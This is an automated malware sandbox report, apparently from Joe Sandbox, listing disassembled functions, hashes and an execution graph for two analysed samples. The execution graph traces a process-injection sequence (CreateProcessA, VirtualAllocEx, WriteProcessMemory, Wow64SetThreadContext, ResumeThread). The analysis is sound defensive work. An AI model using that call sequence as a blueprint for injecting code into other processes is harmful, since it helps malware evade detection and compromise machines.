                      control_flow_graph 1343 6977148-6977630 1345 6977632-6977635 1343->1345 1346 6977638-6977663 LoadLibraryW 1343->1346 1345->1346 1347 6977665-697766b 1346->1347 1348 697766c-6977689 1346->1348 1347->1348
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069774A6), ref: 06977656
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258425881.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6970000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: ]{3
                      • API String ID: 1029625771-1008762302
                      • Opcode ID: 0d748796d32853f4e8bf0353759dc40a7957baf8cfbc135bdae23dfffaaee36f
                      • Instruction ID: cd20d31aa6f2c789d0b35d3387582b44167b7137a91c01451bf1baa18414b252
                      • Opcode Fuzzy Hash: 0d748796d32853f4e8bf0353759dc40a7957baf8cfbc135bdae23dfffaaee36f
                      • Instruction Fuzzy Hash: EA1123B1C007498FDB10DF9AC844A9EFBF8EF89210F14842AD419BB610D379A545CFA5
                      Function 013C0CE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1351 13c0ce0-13c0d54 GetConsoleWindow 1355 13c0d5d-13c0d82 1351->1355 1356 13c0d56-13c0d5c 1351->1356 1356->1355
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 013C0D47
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243515684.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_13c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID: ]{3
                      • API String ID: 2863861424-1008762302
                      • Opcode ID: f0bd77b35a4dbaa9c41213458e83f87084545d4124399b44cbbe79b47f33b3be
                      • Instruction ID: 87b707547a1f80dcafa727e850d38871d842ae5f69174a5d1912ad065004e6e0
                      • Opcode Fuzzy Hash: f0bd77b35a4dbaa9c41213458e83f87084545d4124399b44cbbe79b47f33b3be
                      • Instruction Fuzzy Hash: 1B1146B58003488FDB24DFAAC4487EEFFF4EF89324F208419D019A7240C739A945CBA0
                      Function 013C0CE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1360 13c0ce8-13c0d54 GetConsoleWindow 1363 13c0d5d-13c0d82 1360->1363 1364 13c0d56-13c0d5c 1360->1364 1364->1363
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 013C0D47
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243515684.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_13c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID: ]{3
                      • API String ID: 2863861424-1008762302
                      • Opcode ID: 5f180b01401dd62d64219e789904fee4b215b0f36200d01a1ea048f649f0e7f6
                      • Instruction ID: f5692fa480c59a8bcceda2033c47281e844bcdf681cbdc82d4612ffe6f40bd05
                      • Opcode Fuzzy Hash: 5f180b01401dd62d64219e789904fee4b215b0f36200d01a1ea048f649f0e7f6
                      • Instruction Fuzzy Hash: 2C1133B5D002498FDB24DFAAC4497EEFFF4EF48324F20841AD519A7240CB39A944CBA0
                      Function 069C1550 Relevance: 1.4, Instructions: 1412COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab0492c69dce681ac086a303e152c201565081a2c334287466537651336a5d78
                      • Instruction ID: a93d4cb4f51dd7ead926e3e97fdf3a26800c3da636733b3207e6da670e0f3d25
                      • Opcode Fuzzy Hash: ab0492c69dce681ac086a303e152c201565081a2c334287466537651336a5d78
                      • Instruction Fuzzy Hash: 8FC26C74B402189FCB15DB58CD90EADBBB6FF88700F108099E609AB3A5CB75AE41CF51
                      Function 069C349D Relevance: 1.3, Instructions: 1278COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e774bfd7200bc069c588af4257ea2965a136e6c15f8fb7f9bf634df92a748f4f
                      • Instruction ID: 4ad43d2f2bfdf0bd08e67144170f4a5e55d54880a89b19c64a57a621d0071563
                      • Opcode Fuzzy Hash: e774bfd7200bc069c588af4257ea2965a136e6c15f8fb7f9bf634df92a748f4f
                      • Instruction Fuzzy Hash: 4CA1C274B002159FCB44DB68C954A6EBBF6FF89310B20C4AAE515DB7A5CB38DC05CB62
                      Function 069C0048 Relevance: .7, Instructions: 664COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f2a2066153a2f59cacf8f0ccfb3905a9172c18951e7fa677b9319baa9c766ff
                      • Instruction ID: ef27cf70642daa09704c91d3e10e96dc7cc653ee278880c4b1f3c76ff56dded5
                      • Opcode Fuzzy Hash: 7f2a2066153a2f59cacf8f0ccfb3905a9172c18951e7fa677b9319baa9c766ff
                      • Instruction Fuzzy Hash: 1E4257707406258FCB25DF68D450AAEBAB6FF81324F014A5CD5029B794CF7AED098BC6
                      Function 069C04F4 Relevance: .5, Instructions: 500COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b26572440dc709df2d40988f5959be0200e44c1c7b7ff1320a2e8df2ce809867
                      • Instruction ID: b6cab6ebd6b142775a195dc028ae18b36605c660fbe51b0badabf7d2459de6d0
                      • Opcode Fuzzy Hash: b26572440dc709df2d40988f5959be0200e44c1c7b7ff1320a2e8df2ce809867
                      • Instruction Fuzzy Hash: 7B12A970740615CFCB15DF68D440AAEBBB6FF85324F00895CD5029B7A5CB7AED098B86
                      Function 069C056A Relevance: .5, Instructions: 465COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f2d7c844135d8ee3bf9dfdfa951e447a68f96bb478c50680a09c2dcacdfab60
                      • Instruction ID: 1b9a7b8542c633c16941d3594c4598542beaea29b7d6eeca3a0edfdb8c705b52
                      • Opcode Fuzzy Hash: 6f2d7c844135d8ee3bf9dfdfa951e447a68f96bb478c50680a09c2dcacdfab60
                      • Instruction Fuzzy Hash: 0312A970740615CFCB14DF68D840AAE7BB6FF85724F00895CD5029B7A5CBBAED098B92
                      Function 069C05E0 Relevance: .4, Instructions: 427COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f3e1a47771ae3296e8ab859fdcfd01d43ba180152ee5080ae764dd35813be49
                      • Instruction ID: deee456749759d3e64b6d6fa6ba2ed4465599f2d8e927b4886525405d3cd0a45
                      • Opcode Fuzzy Hash: 5f3e1a47771ae3296e8ab859fdcfd01d43ba180152ee5080ae764dd35813be49
                      • Instruction Fuzzy Hash: 3002BD70B40214CFCB14DF68C840AAE7BB6FF85714F108958D9029B7A5CB7AED09CB92
                      Function 069C0656 Relevance: .4, Instructions: 389COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9fd4c818fdeaee708b9cbc5faafc6f2e0730e8733956a67e3c6a972fa32ef463
                      • Instruction ID: 58d1a52d4008e9e5d2e025604430a6fd9c2375fd7936ee6279feeae8ecf37a90
                      • Opcode Fuzzy Hash: 9fd4c818fdeaee708b9cbc5faafc6f2e0730e8733956a67e3c6a972fa32ef463
                      • Instruction Fuzzy Hash: 9EF1CF70B40214CFCB04DF68C851AAE7BB6FF85714F108459D9029B7A5CBBAED05CB92
                      Function 069C06CC Relevance: .4, Instructions: 355COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26a12529aa9388e65c77fc8895340b74b27a4fe54771cf23e3a31343ea6970a7
                      • Instruction ID: c699ba264e44d08b764d98cb294fc938893304eefe586ad69b2f87a0e7518f9d
                      • Opcode Fuzzy Hash: 26a12529aa9388e65c77fc8895340b74b27a4fe54771cf23e3a31343ea6970a7
                      • Instruction Fuzzy Hash: BDE1E070B40214DFDB00DF68C841A6E7BBAFF85714F108459E9019B7A5CBB6ED05CB92
                      Function 069C0001 Relevance: .3, Instructions: 343COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4c831277a7db751916caf5e663b31398e2ced4b89a20c7e98a30a3a6950ac8ea
                      • Instruction ID: 659bb1c807549c70cd7d937200b365677d723b40b062d3bb7bc62e7c4c48fb9b
                      • Opcode Fuzzy Hash: 4c831277a7db751916caf5e663b31398e2ced4b89a20c7e98a30a3a6950ac8ea
                      • Instruction Fuzzy Hash: FAD1E270B04204DFDB01CF64C855A6A7BBAFF85714F10809AE5019F7A6CBB6DD05CBA2
                      Function 069C1531 Relevance: .3, Instructions: 330COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 94635f8d9b2e237855207928dcb4dea65aa712bd478723ef1ffe906bcfd449f2
                      • Instruction ID: 47c763a7ee89151b18f471ebaf9914a624d977dec02f55a25e877b0048c9d1d4
                      • Opcode Fuzzy Hash: 94635f8d9b2e237855207928dcb4dea65aa712bd478723ef1ffe906bcfd449f2
                      • Instruction Fuzzy Hash: 63C17D38B10114AFCB04DF98C985EADBBB6FF49704F608059F9019B765C672ED09CB66
                      Function 069C3138 Relevance: .2, Instructions: 241COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1b7afe2bc3735a42d9c9a57eb1f8fb1691c305c1b6e08ffb6949aa4e306c08f
                      • Instruction ID: 37099500667f494b374714a7b00fab21131427f709e42b5b11cf216d8973b836
                      • Opcode Fuzzy Hash: c1b7afe2bc3735a42d9c9a57eb1f8fb1691c305c1b6e08ffb6949aa4e306c08f
                      • Instruction Fuzzy Hash: 1D918D74B102149FCB44CF68C894E9EBBF6FF89710B55C0A9E905AB361DA35EC05CB61
                      Function 069C11A8 Relevance: .2, Instructions: 202COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb77de3ca903504fb92a82ef1e6007eb68f3b724dc99c856667401fae4ba49ec
                      • Instruction ID: 58f5166e816998a5e5184a09431dba3788ec12c1333fb432b3ef850acbe53e7a
                      • Opcode Fuzzy Hash: bb77de3ca903504fb92a82ef1e6007eb68f3b724dc99c856667401fae4ba49ec
                      • Instruction Fuzzy Hash: 4D514935B002058FCB549F6DD89057ABBF9EFC6220B24857ED845C7A22EF31C846C7A6
                      Function 0131D054 Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243163126.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_131d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 92bfb308a43eeca1af6b2f2737f0a6792e17cc137d0f3a2150796deb5137b864
                      • Instruction ID: 7ff5712458ba73e79ebfc06ff445a8c1134a5245158e228075d0d287765a053e
                      • Opcode Fuzzy Hash: 92bfb308a43eeca1af6b2f2737f0a6792e17cc137d0f3a2150796deb5137b864
                      • Instruction Fuzzy Hash: 95213D71500244DFCF19DF54D9C4F16BF65FB89318F24C569E9090B25AC33AD416CBA1
                      Function 0132D474 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8395dca8f96635b7146b3f75af126e5495abfefc39eabf4e948b82a430a29d2d
                      • Instruction ID: 081cbecc21b21d591e2341fe8c86db16f5710f759d05802ef05b0b9e28139f84
                      • Opcode Fuzzy Hash: 8395dca8f96635b7146b3f75af126e5495abfefc39eabf4e948b82a430a29d2d
                      • Instruction Fuzzy Hash: 90210471504204EFDB05EFA8D9C4F26BB69FB8831CF20C96DD9094B356C77AE406CA62
                      Function 0132D2C4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1a13eaf1286f880a964feb82b31182bb0b1775bad6ad034c9eaac2011582a0d4
                      • Instruction ID: 0453c3c53b9ea0008f6352c04c386dc1d684aeb4d8e0434d3d9ad654ec264127
                      • Opcode Fuzzy Hash: 1a13eaf1286f880a964feb82b31182bb0b1775bad6ad034c9eaac2011582a0d4
                      • Instruction Fuzzy Hash: B7213571504204DFDB05EF98D9C0B2ABF69FB88328F24C56DDA494B346C33AD406CAB2
                      Function 0131D04F Relevance: .1, Instructions: 58COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243163126.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_131d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                      • Instruction ID: e6f5dd29c2e9075d641d090c1815face063d3af5404869de83ae57f3da9fba9d
                      • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                      • Instruction Fuzzy Hash: 5121C072404280DFCB06CF54D9C4B16BF72FB89314F2486A9D9480A25BC33AD416CB91
                      Function 0132D2BF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                      • Instruction ID: 15bdc69f89d64f112b4e71e270598e2a20490498e9deea9dee6d63550fb30c06
                      • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                      • Instruction Fuzzy Hash: 0111BF76504280CFDB12DF14D5C4B19FF61FB84328F28C6AAD9494B656C33AD44ACBA2
                      Function 0132D46F Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2243215327.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_132d000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction ID: 4aa49c37c137af173c4f91e179d52c834d4a574ca2d4793d353b7bfe3fde5ea2
                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction Fuzzy Hash: A911DD75504280CFDB02DF54C5C4B15BFB1FB88318F24C6AAD8494B256C37AD40ACB62

                      Non-executed Functions

                      Function 069C0D50 Relevance: 10.3, Strings: 8, Instructions: 299COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258511269.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_69c0000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                      • API String ID: 0-1273862796
                      • Opcode ID: 62a7a0b37ca0d2b800c5facf19cab45eef51430f206f5f442cf62a732208e63b
                      • Instruction ID: 457aace904564bac7855afc758685f6a495e4aa8b9818dd1503b6a1c1ef5a382
                      • Opcode Fuzzy Hash: 62a7a0b37ca0d2b800c5facf19cab45eef51430f206f5f442cf62a732208e63b
                      • Instruction Fuzzy Hash: C0B1AD30B00245CFDB55CB69C9549AEBBF6BF89220F14846EE406D77A1CB35DC45CBA2

                      Execution Graph

                      Execution Coverage:10.7%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:204
                      Total number of Limit Nodes:16
                      execution_graph 22650 13baf78 22654 13bb061 22650->22654 22662 13bb070 22650->22662 22651 13baf87 22655 13bb081 22654->22655 22656 13bb0a4 22654->22656 22655->22656 22670 13bb2f9 22655->22670 22674 13bb308 22655->22674 22656->22651 22657 13bb2a8 GetModuleHandleW 22659 13bb2d5 22657->22659 22658 13bb09c 22658->22656 22658->22657 22659->22651 22663 13bb0a4 22662->22663 22664 13bb081 22662->22664 22663->22651 22664->22663 22668 13bb2f9 LoadLibraryExW 22664->22668 22669 13bb308 LoadLibraryExW 22664->22669 22665 13bb09c 22665->22663 22666 13bb2a8 GetModuleHandleW 22665->22666 22667 13bb2d5 22666->22667 22667->22651 22668->22665 22669->22665 22671 13bb31c 22670->22671 22672 13bb341 22671->22672 22678 13baa88 22671->22678 22672->22658 22675 13bb31c 22674->22675 22676 13bb341 22675->22676 22677 13baa88 LoadLibraryExW 22675->22677 22676->22658 22677->22676 22679 13bb4e8 LoadLibraryExW 22678->22679 22681 13bb561 22679->22681 22681->22672 22871 13bd548 DuplicateHandle 22872 13bd5de 22871->22872 22873 13b4668 22874 13b467a 22873->22874 22875 13b4686 22874->22875 22877 13b4779 22874->22877 22878 13b479d 22877->22878 22882 13b4878 22878->22882 22886 13b4888 22878->22886 22884 13b4888 22882->22884 22883 13b498c 22884->22883 22890 13b44b0 22884->22890 22887 13b48af 22886->22887 22888 13b498c 22887->22888 22889 13b44b0 CreateActCtxA 22887->22889 22889->22888 22891 13b5918 CreateActCtxA 22890->22891 22893 13b59db 22891->22893 22893->22893 22894 30575b0 22895 305773b 22894->22895 22897 30575d6 22894->22897 22897->22895 22898 3055ac0 22897->22898 22899 3057830 PostMessageW 22898->22899 22900 305789c 22899->22900 22900->22897 22682 305408c 22684 3054092 22682->22684 22683 305413a 22684->22683 22688 305640e 22684->22688 22707 30563a8 22684->22707 22725 3056398 22684->22725 22689 305639c 22688->22689 22691 3056411 22688->22691 22690 30563ca 22689->22690 22743 3056a45 22689->22743 22748 3056d3a 22689->22748 22753 305689a 22689->22753 22758 3056d79 22689->22758 22764 3056c1e 22689->22764 22769 30567bd 22689->22769 22775 30568d2 22689->22775 22780 3056995 22689->22780 22785 3056cce 22689->22785 22790 3056ecc 22689->22790 22795 3056b83 22689->22795 22800 30567a1 22689->22800 22805 30567e7 22689->22805 22809 3056b04 22689->22809 22815 3056a04 22689->22815 22690->22683 22691->22683 22708 30563c2 22707->22708 22709 30563ca 22708->22709 22710 3056a45 2 API calls 22708->22710 22711 3056a04 4 API calls 22708->22711 22712 3056b04 2 API calls 22708->22712 22713 30567e7 2 API calls 22708->22713 22714 30567a1 2 API calls 22708->22714 22715 3056b83 2 API calls 22708->22715 22716 3056ecc 2 API calls 22708->22716 22717 3056cce 2 API calls 22708->22717 22718 3056995 2 API calls 22708->22718 22719 30568d2 2 API calls 22708->22719 22720 30567bd 2 API calls 22708->22720 22721 3056c1e 2 API calls 22708->22721 22722 3056d79 2 API calls 22708->22722 22723 305689a 2 API calls 22708->22723 22724 3056d3a 2 API calls 22708->22724 22709->22683 22710->22709 22711->22709 22712->22709 22713->22709 22714->22709 22715->22709 22716->22709 22717->22709 22718->22709 22719->22709 22720->22709 22721->22709 22722->22709 22723->22709 22724->22709 22726 305639c 22725->22726 22727 3056a45 2 API calls 22726->22727 22728 3056a04 4 API calls 22726->22728 22729 3056b04 2 API calls 22726->22729 22730 30567e7 2 API calls 22726->22730 22731 30567a1 2 API calls 22726->22731 22732 3056b83 2 API calls 22726->22732 22733 3056ecc 2 API calls 22726->22733 22734 3056cce 2 API calls 22726->22734 22735 3056995 2 API calls 22726->22735 22736 30563ca 22726->22736 22737 30568d2 2 API calls 22726->22737 22738 30567bd 2 API calls 22726->22738 22739 3056c1e 2 API calls 22726->22739 22740 3056d79 2 API calls 22726->22740 22741 305689a 2 API calls 22726->22741 22742 3056d3a 2 API calls 22726->22742 22727->22736 22728->22736 22729->22736 22730->22736 22731->22736 22732->22736 22733->22736 22734->22736 22735->22736 22736->22683 22737->22736 22738->22736 22739->22736 22740->22736 22741->22736 22742->22736 22744 3056f30 22743->22744 22822 3053691 22744->22822 22827 3053698 22744->22827 22745 3056f4e 22749 3056cd5 22748->22749 22831 3053508 22749->22831 22835 3053510 22749->22835 22750 305719b 22754 30568a0 22753->22754 22756 3053510 ResumeThread 22754->22756 22757 3053508 ResumeThread 22754->22757 22755 305719b 22756->22755 22757->22755 22759 3056d86 22758->22759 22760 3056b9b 22758->22760 22839 3053750 22760->22839 22843 3053758 22760->22843 22761 3056bbc 22765 305712e 22764->22765 22847 3053848 22765->22847 22851 3053841 22765->22851 22766 3057150 22771 30567b0 22769->22771 22772 3057318 22771->22772 22855 30539d4 22771->22855 22859 30539e0 22771->22859 22772->22690 22776 30568de 22775->22776 22777 3056849 22776->22777 22863 30535c0 22776->22863 22867 30535b9 22776->22867 22777->22690 22781 30569b8 22780->22781 22783 3053750 WriteProcessMemory 22781->22783 22784 3053758 WriteProcessMemory 22781->22784 22782 3056dce 22783->22782 22784->22782 22786 3056cd4 22785->22786 22788 3053510 ResumeThread 22786->22788 22789 3053508 ResumeThread 22786->22789 22787 305719b 22788->22787 22789->22787 22791 3056ed5 22790->22791 22793 3053750 WriteProcessMemory 22791->22793 22794 3053758 WriteProcessMemory 22791->22794 22792 30570fc 22793->22792 22794->22792 22796 3056b9b 22795->22796 22798 3053750 WriteProcessMemory 22796->22798 22799 3053758 WriteProcessMemory 22796->22799 22797 3056bbc 22798->22797 22799->22797 22801 30567eb 22800->22801 22803 30539d4 CreateProcessA 22801->22803 22804 30539e0 CreateProcessA 22801->22804 22802 305681e 22802->22802 22803->22802 22804->22802 22806 305681e 22805->22806 22807 30539d4 CreateProcessA 22805->22807 22808 30539e0 CreateProcessA 22805->22808 22806->22806 22807->22806 22808->22806 22811 3056b09 22809->22811 22810 3056f98 22810->22690 22811->22810 22813 3053510 ResumeThread 22811->22813 22814 3053508 ResumeThread 22811->22814 22812 305719b 22813->22812 22814->22812 22820 30535c0 Wow64SetThreadContext 22815->22820 22821 30535b9 Wow64SetThreadContext 22815->22821 22816 30568b8 22816->22690 22818 3053510 ResumeThread 22816->22818 22819 3053508 ResumeThread 22816->22819 22817 305719b 22818->22817 22819->22817 22820->22816 22821->22816 22823 3053696 VirtualAllocEx 22822->22823 22824 305364c 22822->22824 22826 3053715 22823->22826 22824->22745 22826->22745 22828 30536d8 VirtualAllocEx 22827->22828 22830 3053715 22828->22830 22830->22745 22832 3053550 ResumeThread 22831->22832 22834 3053581 22832->22834 22834->22750 22836 3053550 ResumeThread 22835->22836 22838 3053581 22836->22838 22838->22750 22840 30537a0 WriteProcessMemory 22839->22840 22842 30537f7 22840->22842 22842->22761 22844 30537a0 WriteProcessMemory 22843->22844 22846 30537f7 22844->22846 22846->22761 22848 3053893 ReadProcessMemory 22847->22848 22850 30538d7 22848->22850 22850->22766 22852 3053893 ReadProcessMemory 22851->22852 22854 30538d7 22852->22854 22854->22766 22856 3053a69 CreateProcessA 22855->22856 22858 3053c2b 22856->22858 22860 3053a69 CreateProcessA 22859->22860 22862 3053c2b 22860->22862 22864 3053605 Wow64SetThreadContext 22863->22864 22866 305364d 22864->22866 22866->22776 22868 30535c0 Wow64SetThreadContext 22867->22868 22870 305364d 22868->22870 22870->22776 22901 13bd300 22902 13bd346 GetCurrentProcess 22901->22902 22904 13bd398 GetCurrentThread 22902->22904 22905 13bd391 22902->22905 22906 13bd3ce 22904->22906 22907 13bd3d5 GetCurrentProcess 22904->22907 22905->22904 22906->22907 22910 13bd40b 22907->22910 22908 13bd433 GetCurrentThreadId 22909 13bd464 22908->22909 22910->22908

                      Executed Functions

                      Function 013BD2F3 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 294 13bd2f3-13bd38f GetCurrentProcess 299 13bd398-13bd3cc GetCurrentThread 294->299 300 13bd391-13bd397 294->300 301 13bd3ce-13bd3d4 299->301 302 13bd3d5-13bd409 GetCurrentProcess 299->302 300->299 301->302 304 13bd40b-13bd411 302->304 305 13bd412-13bd42d call 13bd4db 302->305 304->305 308 13bd433-13bd462 GetCurrentThreadId 305->308 309 13bd46b-13bd4cd 308->309 310 13bd464-13bd46a 308->310 310->309
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 013BD37E
                      • GetCurrentThread.KERNEL32 ref: 013BD3BB
                      • GetCurrentProcess.KERNEL32 ref: 013BD3F8
                      • GetCurrentThreadId.KERNEL32 ref: 013BD451
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
